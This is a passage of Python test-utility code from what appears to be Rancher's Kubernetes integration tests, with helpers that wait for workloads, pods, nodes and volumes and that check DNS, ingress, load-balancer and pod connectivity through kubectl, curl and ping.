wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
if type == "job":
job_type = True
expected_status = "Succeeded"
else:
job_type = False
expected_status = "Running"
p = wait_for_pod_to_running(p_client, pod, job_type=job_type)
assert p["status"]["phase"] == expected_status
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
if type == "job":
assert wl_result["status"]["succeeded"] == len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
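# A usage sketch for execute_kubectl_cmd (the namespace name is a placeholder;
# a kubeconfig written by create_kubeconfig and kubectl on PATH are assumed):
# list pods in a namespace and read names from the parsed JSON the helper
# returns when json_out is True.
def _example_list_pod_names(ns_name="default"):
    result = execute_kubectl_cmd("get pods -n " + ns_name)
    return [item["metadata"]["name"] for item in result["items"]]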
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
    except subprocess.CalledProcessError:
        return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT, job_type=False):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
if job_type:
expected_state = "succeeded"
else:
expected_state = "running"
    while p.state != expected_state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if ('k3s' in cluster.version["gitVersion"] or 'rke2' in cluster.version["gitVersion"]) and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
    if insecure_redirect:
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
if result is not None:
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
    # Allow some time for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id],
"targetPort": TEST_IMAGE_PORT}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected, port=TEST_IMAGE_PORT):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected, port=port)
def validate_dns_entry(pod, host, expected, port=TEST_IMAGE_PORT):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
if HARDENED_CLUSTER:
cmd = 'curl -vs {}:{} 2>&1'.format(host, port)
else:
cmd = 'ping -c 1 -W 1 {0}'.format(host)
cmd_output = kubectl_pod_exec(pod, cmd)
connectivity_validation_pass = False
for expected_value in expected:
if expected_value in str(cmd_output):
connectivity_validation_pass = True
break
assert connectivity_validation_pass is True
if HARDENED_CLUSTER:
assert " 200 OK" in str(cmd_output)
else:
assert " 0% packet loss" in str(cmd_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
    Validates that the dns_record no longer exists for the given client.
    @param client: client object used to create the dns_record
    @param dns_record: record object expected to be deleted
    @param timeout: max time to keep checking whether the record is deleted
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for node delete")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
        cluster_type = get_cluster_type(client, cluster)
        print(cluster_type)
        if cluster_type in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
elif HARDENED_CLUSTER:
cmd = 'curl -I {}:{}'.format(pod_ip, TEST_IMAGE_PORT)
else:
cmd = "ping -c 1 -W 1 " + pod_ip
response = kubectl_pod_exec(pod1, cmd)
if not HARDENED_CLUSTER:
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" not in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
    for x in range(0, numofpods):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
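# Illustrative sketch (not part of the original suite): wait_until_available()
# polls with exponential backoff (0.01s doubling, capped at 2s) until the
# object can be reloaded again, treating 403 as "not visible yet". A typical
# use is waiting for a freshly shared project to become visible to a newly
# added member; get_client_for_token() and the project object are assumed to
# come from the surrounding test setup.
def _example_wait_for_project_visibility(user_token, project):
    user_client = get_client_for_token(user_token)
    return wait_until_available(user_client, project)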
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
    start = time.time()
    time.sleep(2)
    pv_list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
    assert len(pv_list) == 1
    pv = pv_list[0]
    while pv.state != "available":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to available")
        time.sleep(.5)
        pv_list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
        assert len(pv_list) == 1
        pv = pv_list[0]
    return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
    start = time.time()
    time.sleep(2)
    pvc_list = p_client.list_persistent_volume_claim(
        uuid=pvc_object.uuid).data
    assert len(pvc_list) == 1
    pvc = pvc_list[0]
    while pvc.state != "bound":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to bound")
        time.sleep(.5)
        pvc_list = p_client.list_persistent_volume_claim(
            uuid=pvc_object.uuid).data
        assert len(pvc_list) == 1
        pvc = pvc_list[0]
    return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
